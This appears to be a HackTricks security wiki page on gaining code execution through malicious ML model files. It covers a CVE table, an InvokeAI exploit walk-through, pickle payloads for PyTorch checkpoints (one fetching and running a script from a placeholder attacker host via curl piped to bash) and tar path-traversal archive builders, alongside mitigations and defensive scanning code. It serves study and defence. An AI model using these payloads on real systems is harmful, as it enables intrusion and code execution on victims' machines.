RCE with Models


Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Loading models to RCE

Machine Learning models are usually shared in different formats, such as ONNX, TensorFlow, PyTorch, etc. These models can be loaded on developers' machines or production systems to use them. Usually models shouldn't contain malicious code, but there are some cases where a model can be used to execute arbitrary code on the system, either as an intended feature or because of a vulnerability in the model-loading library.

At the time of writing, these are some examples of this kind of vulnerability:

| Framework / Tool | Vulnerability (CVE if available) | RCE Vector | References |
|---|---|---|---|
| PyTorch (Python) | Insecure deserialization in torch.load (CVE-2025-32434) | Malicious pickle in model checkpoint leads to code execution (bypassing the weights_only safeguard) | |
| PyTorch TorchServe | ShellTorch: CVE-2023-43654, CVE-2022-1471 | SSRF + malicious model download causes code execution; Java deserialization RCE in the management API | |
| NVIDIA Merlin Transformers4Rec | Unsafe checkpoint deserialization via torch.load (CVE-2025-23298) | Untrusted checkpoint triggers a pickle reducer during load_model_trainer_states_from_checkpoint → code execution in the ML worker | ZDI-25-833 |
| TensorFlow/Keras | CVE-2021-37678 (unsafe YAML); CVE-2024-3660 (Keras Lambda) | Loading a model from YAML uses yaml.unsafe_load (code exec); loading a model with a Lambda layer runs arbitrary Python code | |
| TensorFlow (TFLite) | CVE-2022-23559 (TFLite parsing) | Crafted .tflite model triggers integer overflow → heap corruption (potential RCE) | |
| Scikit-learn (Python) | CVE-2020-13092 (joblib/pickle) | Loading a model via joblib.load executes pickle with the attacker's __reduce__ payload | |
| NumPy (Python) | CVE-2019-6446 (unsafe np.load), disputed | numpy.load's default allowed pickled object arrays – a malicious .npy/.npz triggers code exec | |
| ONNX / ONNX Runtime | CVE-2022-25882 (dir traversal); CVE-2024-5187 (tar traversal) | ONNX model's external-weights path can escape the directory (read arbitrary files); malicious ONNX model tar can overwrite arbitrary files (leading to RCE) | |
| ONNX Runtime (design risk) | (No CVE) ONNX custom ops / control flow | Model with a custom operator requires loading the attacker's native code; complex model graphs abuse logic to execute unintended computations | |
| NVIDIA Triton Server | CVE-2023-31036 (path traversal) | Using the model-load API with --model-control enabled allows relative path traversal to write files (e.g., overwriting .bashrc for RCE) | |
| GGML (GGUF format) | CVE-2024-25664 … 25668 (multiple heap overflows) | Malformed GGUF model file causes heap buffer overflows in the parser, allowing arbitrary code execution on the victim system | |
| Keras (older formats) | (No new CVE) Legacy Keras H5 model | Malicious HDF5 (.h5) model with a Lambda layer still executes code on load (Keras safe_mode does not cover old formats – "downgrade attack") | |
| Others (general) | Design flaw – Pickle serialization | Many ML tools (e.g., pickle-based model formats, Python pickle.load) will execute arbitrary code embedded in model files unless mitigated | |

Moreover, there are some models based on Python pickle, such as those used by PyTorch, that can be used to execute arbitrary code on the system if they are not loaded with weights_only=True. Therefore, any pickle-based model may be especially susceptible to this kind of attack, even if it is not listed in the table above.

🆕 InvokeAI RCE via torch.load (CVE-2024-12029)

InvokeAI is a popular open-source web interface for Stable-Diffusion. Versions 5.3.1 – 5.4.2 expose the REST endpoint /api/v2/models/install that lets users download and load models from arbitrary URLs.

Internally the endpoint eventually calls:

```python
checkpoint = torch.load(path, map_location=torch.device("meta"))
```

When the supplied file is a PyTorch checkpoint (*.ckpt), torch.load performs pickle deserialization. Because the content comes directly from the user-controlled URL, an attacker can embed a malicious object with a custom __reduce__ method inside the checkpoint; that method is executed during deserialization, leading to remote code execution (RCE) on the InvokeAI server.

The vulnerability was assigned CVE-2024-12029 (CVSS 9.8, EPSS 61.17 %).

Exploitation walk-through

1. Create a malicious checkpoint:

```python
# payload_gen.py
import pickle, torch, os

class Payload:
    def __reduce__(self):
        return (os.system, ("/bin/bash -c 'curl http://ATTACKER/pwn.sh|bash'",))

with open("payload.ckpt", "wb") as f:
    pickle.dump(Payload(), f)
```

2. Host payload.ckpt on an HTTP server you control (e.g. http://ATTACKER/payload.ckpt).

3. Trigger the vulnerable endpoint (no authentication required):

```python
import requests

requests.post(
    "http://TARGET:9090/api/v2/models/install",
    params={
        "source": "http://ATTACKER/payload.ckpt",  # remote model URL
        "inplace": "true",                         # write inside models dir
        # the dangerous default is scan=false → no AV scan
    },
    json={},                                         # body can be empty
    timeout=5,
)
```

4. When InvokeAI downloads the file it calls torch.load() → the os.system gadget runs and the attacker gets code execution in the context of the InvokeAI process.

Ready-made exploit: the Metasploit module exploit/linux/http/invokeai_rce_cve_2024_12029 automates the whole process.

Preconditions

• InvokeAI 5.3.1-5.4.2 (scan flag defaults to false)
• /api/v2/models/install reachable by the attacker
• The process has permission to execute shell commands

Mitigation

  • Upgrade to InvokeAI ≥ 5.4.3 – the patch sets scan=True by default and performs malware scanning before deserialization.
  • When loading checkpoints programmatically use torch.load(file, weights_only=True) or the new torch.load_safe helper.
  • Enforce allow-lists / signatures for model sources and run the service with least privilege.

⚠️ Remember that any pickle-based Python format (including many .pt, .pkl, .ckpt, .pth files) is inherently unsafe to deserialize from untrusted sources.


Example ad-hoc mitigation if you must keep older InvokeAI versions running behind a reverse proxy (note that nginx evaluates allow/deny rules in order and stops at the first match, so the allow rule has to come before deny all):

```nginx
location /api/v2/models/install {
    allow 10.0.0.0/8;               # only the internal CI network can call it
    deny all;                       # block direct Internet access
}
```

🆕 NVIDIA Merlin Transformers4Rec RCE via unsafe torch.load (CVE-2025-23298)

NVIDIA's Transformers4Rec (part of Merlin) exposed an unsafe checkpoint loader that directly called torch.load() on user-provided paths. Because torch.load relies on Python pickle, an attacker-controlled checkpoint can execute arbitrary code via a reducer during deserialization.

Vulnerable path (pre-fix): transformers4rec/torch/trainer/trainer.py → load_model_trainer_states_from_checkpoint(...) → torch.load(...).

Why this leads to RCE: In Python pickle, an object can specify a reducer (__reduce__/__setstate__) that returns a callable and arguments. The callable is executed during unpickling. If such an object is present in a checkpoint, it runs before any weights are used.

Minimal malicious checkpoint example:

```python
import torch

class Evil:
    def __reduce__(self):
        import os
        return (os.system, ("id > /tmp/pwned",))

# Place the object under a key guaranteed to be deserialized early
ckpt = {
    "model_state_dict": Evil(),
    "trainer_state": {"epoch": 10},
}

torch.save(ckpt, "malicious.ckpt")
```

Delivery vectors and blast radius:

  • Trojanized checkpoints/models shared via repos, buckets, or artifact registries
  • Automated resume/deploy pipelines that auto-load checkpoints
  • Execution happens inside training/inference workers, often with elevated privileges (e.g., root in containers)

Fix: Commit b7eaea5 (PR #802) replaced the direct torch.load() with a restricted, allow-listed deserializer implemented in transformers4rec/utils/serialization.py. The new loader validates types/fields and prevents arbitrary callables from being invoked during load.

Defensive guidance specific to PyTorch checkpoints:

  • Do not unpickle untrusted data. Prefer non-executable formats like Safetensors or ONNX where possible.
  • If you must use PyTorch serialization, ensure weights_only=True (supported in recent PyTorch) or use a custom allow-listed unpickler similar to the Transformers4Rec patch.
  • Enforce model provenance/signatures and sandbox deserialization (seccomp/AppArmor; non-root user; restricted FS and no network egress).
  • Monitor for unexpected child processes from ML services at checkpoint load time; trace torch.load()/pickle usage.

POC and vulnerable/patch references:

  • Vulnerable pre-patch loader: https://gist.github.com/zdi-team/56ad05e8a153c84eb3d742e74400fd10.js
  • Malicious checkpoint POC: https://gist.github.com/zdi-team/fde7771bb93ffdab43f15b1ebb85e84f.js
  • Post-patch loader: https://gist.github.com/zdi-team/a0648812c52ab43a3ce1b3a090a0b091.js
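The two controls recommended above (an allow-listed unpickler like the Transformers4Rec patch, and tracing what a checkpoint would do before it is loaded) can both be built from the standard library alone. The following is an added example, not code from the page or from the Transformers4Rec project: it inspects a pickle stream with pictletools-style opcode walking (nothing is executed) to list every global the stream would import, and it loads only through an Unpickler whose find_class rejects anything outside a small allow-list. The SAFE_GLOBALS set and the sample pickles are constructed for the demo; a real loader would list exactly the types its checkpoint format needs.

```python
import io
import os
import pickle
import pickletools
from collections import OrderedDict

# Allow-list of (module, name) globals a plain weights checkpoint legitimately
# needs. Assumed for this demo; a real loader lists exactly the types it expects.
SAFE_GLOBALS = {
    ("collections", "OrderedDict"),
    ("builtins", "dict"),
    ("builtins", "list"),
    ("builtins", "tuple"),
}

# Opcodes that push a string onto the unpickler stack.
_STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
               "STRING", "BINSTRING", "SHORT_BINSTRING"}


class Reducer:
    """Constructed demo object: its pickle payload would call os.system on load."""

    def __reduce__(self):
        return (os.system, ("echo pwned > /tmp/pwned_demo",))


def make_malicious_pickle() -> bytes:
    """Constructed sample mirroring the checkpoint layout shown on the page."""
    return pickle.dumps({"model_state_dict": Reducer(), "trainer_state": {"epoch": 10}})


def make_benign_pickle() -> bytes:
    """Constructed sample: an OrderedDict of plain lists standing in for tensors."""
    return pickle.dumps(OrderedDict([("fc.weight", [0.1, 0.2]), ("fc.bias", [0.0])]))


def referenced_globals(data: bytes) -> set[tuple[str, str]]:
    """Statically list every (module, name) the stream would import.

    Walks the opcode stream with pickletools.genops, so nothing is executed.
    GLOBAL carries 'module name' as its argument; STACK_GLOBAL (protocol 4+)
    takes the two strings on top of the stack, which may arrive through the
    memo, so a minimal memo of string values is tracked here.
    """
    found: set[tuple[str, str]] = set()
    strings: list[str] = []          # string operands in push order
    memo: dict[int, object] = {}
    last = None                      # most recently pushed value, if it was a string
    for opcode, arg, _pos in pickletools.genops(data):
        name = opcode.name
        if name in _STRING_OPS:
            strings.append(arg)
            last = arg
        elif name == "MEMOIZE":
            memo[len(memo)] = last
        elif name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = last
        elif name in ("GET", "BINGET", "LONG_BINGET"):
            value = memo.get(arg)
            if isinstance(value, str):
                strings.append(value)
                last = value
        elif name == "GLOBAL":
            module, attr = arg.split(" ", 1)
            found.add((module, attr))
            last = None
        elif name == "STACK_GLOBAL":
            if len(strings) >= 2:
                found.add((strings[-2], strings[-1]))
            last = None
        else:
            last = None
    return found


def unsafe_globals(data: bytes) -> set[tuple[str, str]]:
    """Globals referenced by the stream that are not on the allow-list."""
    return referenced_globals(data) - SAFE_GLOBALS


class AllowListUnpickler(pickle.Unpickler):
    """Unpickler that refuses any global outside SAFE_GLOBALS.

    find_class is consulted for every GLOBAL/STACK_GLOBAL before the object is
    used, so a hostile reducer is rejected before REDUCE can call it.
    """

    def find_class(self, module, name):
        if (module, name) not in SAFE_GLOBALS:
            raise pickle.UnpicklingError(f"refusing to import {module}.{name}")
        return super().find_class(module, name)


def safe_load(data: bytes):
    return AllowListUnpickler(io.BytesIO(data)).load()


def load_is_rejected(data: bytes) -> bool:
    """True when the allow-listed loader refuses the stream (nothing executed)."""
    try:
        safe_load(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    for label, blob in (("benign", make_benign_pickle()), ("malicious", make_malicious_pickle())):
        print(label, "imports", sorted(referenced_globals(blob)),
              "| rejected:", load_is_rejected(blob))
```

The static scan is what a CI gate or a model-registry hook would run on every uploaded checkpoint: any global outside the allow-list is a reason to quarantine the file without ever opening it with torch.load. The allow-listed unpickler is the runtime fallback for the case where pickle cannot be avoided; for real PyTorch checkpoints the same find_class override applies to the pickle module torch.load accepts through its pickle_module argument.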

Example – creating a malicious PyTorch model

  • Create the model:

```python
# attacker_payload.py
import torch
import os

class MaliciousPayload:
    def __reduce__(self):
        # This code will be executed when unpickled (e.g., on model.load_state_dict)
        return (os.system, ("echo 'You have been hacked!' > /tmp/pwned.txt",))

# Create a fake model state dict with malicious content
malicious_state = {"fc.weight": MaliciousPayload()}

# Save the malicious state dict
torch.save(malicious_state, "malicious_state.pth")
```

  • Load the model:

```python
# victim_load.py
import torch
import torch.nn as nn

class MyModel(nn.Module):
    def __init__(self):
        super().__init__()
        self.fc = nn.Linear(10, 1)

model = MyModel()

# ⚠️ This will trigger code execution from pickle inside the .pth file
model.load_state_dict(torch.load("malicious_state.pth", weights_only=False))

# /tmp/pwned.txt is created even if you get an error
```

Models to Path Traversal

As mentioned in this blog post, the format of most models used by different AI frameworks is based on archives, usually .zip. Therefore, it may be possible to abuse these formats to perform path traversal attacks, allowing arbitrary files to be read from the system where the model is loaded.

For example, with the following code you can create a model that will create a file in the /tmp directory when loaded:

```python
import tarfile

def escape(member):
    member.name = "../../tmp/hacked"     # break out of the extract dir
    return member

with tarfile.open("traversal_demo.model", "w:gz") as tf:
    tf.add("harmless.txt", filter=escape)
```

Or, with the following code you can create a model that will create a symlink to the /tmp directory when loaded:

```python
import tarfile, pathlib

TARGET  = "/tmp"        # where the payload will land
PAYLOAD = "abc/hacked"

def link_it(member):
    member.type, member.linkname = tarfile.SYMTYPE, TARGET
    return member

with tarfile.open("symlink_demo.model", "w:gz") as tf:
    tf.add(pathlib.Path(PAYLOAD).parent, filter=link_it)
    tf.add(PAYLOAD)                      # rides the symlink
```
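A loader that unpacks archive-based model formats has to validate every member before writing anything to disk. The following is an added example, not code from the page or from any framework: it builds the same two hostile archives shown above in memory (a member whose name climbs out of the extraction directory, and a symlink member pointing at /tmp with a file placed through it) alongside a benign one, and audits each member list with a check that resolves both the member path and any link target against the destination before extraction. The member lists, the destination path and the helper names are constructed for the demo.

```python
import io
import os
import tarfile
import tempfile

# Constructed sample archives: (name, content bytes or None for links, link target).
BENIGN_MEMBERS = [("weights/fc.bin", b"\x00" * 8, None), ("config.json", b"{}", None)]
TRAVERSAL_MEMBERS = [("../../tmp/hacked", b"pwned", None)]
SYMLINK_MEMBERS = [("abc", None, "/tmp"), ("abc/hacked", b"pwned", None)]


def build_archive(members) -> bytes:
    """Build a .tar.gz in memory from (name, data, linkname) tuples (demo helper)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, data, link in members:
            info = tarfile.TarInfo(name)
            if link is not None:
                info.type = tarfile.SYMTYPE
                info.linkname = link
                tf.addfile(info)
            else:
                info.size = len(data)
                tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def _inside(base: str, target: str) -> bool:
    """True when target resolves to base itself or somewhere beneath it."""
    base = os.path.realpath(base)
    target = os.path.realpath(target)
    return target == base or target.startswith(base + os.sep)


def check_members(tf: tarfile.TarFile, dest: str) -> list[str]:
    """Return reasons to reject the archive; an empty list means it passed."""
    problems = []
    for m in tf.getmembers():
        # 1. The member's own path must stay under dest (catches ../ and absolute names).
        if os.path.isabs(m.name) or not _inside(dest, os.path.join(dest, m.name)):
            problems.append(f"{m.name}: path escapes the extraction directory")
        # 2. Link targets must stay under dest too. Symlink targets resolve relative
        #    to the member's own directory; hard-link targets are archive-relative.
        if m.issym() or m.islnk():
            if os.path.isabs(m.linkname):
                target = m.linkname
            elif m.issym():
                target = os.path.join(dest, os.path.dirname(m.name), m.linkname)
            else:
                target = os.path.join(dest, m.linkname)
            if not _inside(dest, target):
                problems.append(f"{m.name}: link to {m.linkname} leaves the extraction directory")
        # 3. Only regular files, directories and links belong in a model archive.
        if not (m.isfile() or m.isdir() or m.issym() or m.islnk()):
            problems.append(f"{m.name}: unexpected member type {m.type!r}")
    return problems


def audit(archive: bytes, dest: str) -> list[str]:
    """Audit an in-memory archive against the intended extraction directory."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tf:
        return check_members(tf, dest)


def safe_extract(archive: bytes, dest: str) -> None:
    """Extract only after the whole member list has passed the checks."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tf:
        problems = check_members(tf, dest)
        if problems:
            raise ValueError("rejected model archive: " + "; ".join(problems))
        # Python 3.12+ ships tarfile.data_filter (PEP 706), which enforces similar
        # rules during extraction; use it as a second layer when available.
        if hasattr(tarfile, "data_filter"):
            tf.extractall(dest, filter="data")
        else:
            tf.extractall(dest)


def extracts_cleanly(archive: bytes) -> bool:
    """Try extraction into a fresh temp dir; True if accepted, False if rejected."""
    with tempfile.TemporaryDirectory() as dest:
        try:
            safe_extract(archive, dest)
        except ValueError:
            return False
        return True


if __name__ == "__main__":
    for label, members in (("benign", BENIGN_MEMBERS), ("traversal", TRAVERSAL_MEMBERS),
                           ("symlink", SYMLINK_MEMBERS)):
        print(label, "->", audit(build_archive(members), "/tmp/model-extract-demo") or "ok")
```

The whole member list is audited before the first byte is written, which matters for the symlink case: the file abc/hacked looks harmless on its own, and only rejecting the archive as a unit stops it from being written through the link once abc exists. The same three checks transfer directly to zip-based formats (zipfile exposes the member names and external attributes in the same way).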

Deep-dive: Keras .keras deserialization and gadget hunting

For focused guidance on .keras internals, Lambda-layer RCE, the arbitrary import issue in ≤ 3.8, and post-fix gadget discovery inside the allowlist, see:

Keras Model Deserialization Rce And Gadget Hunting
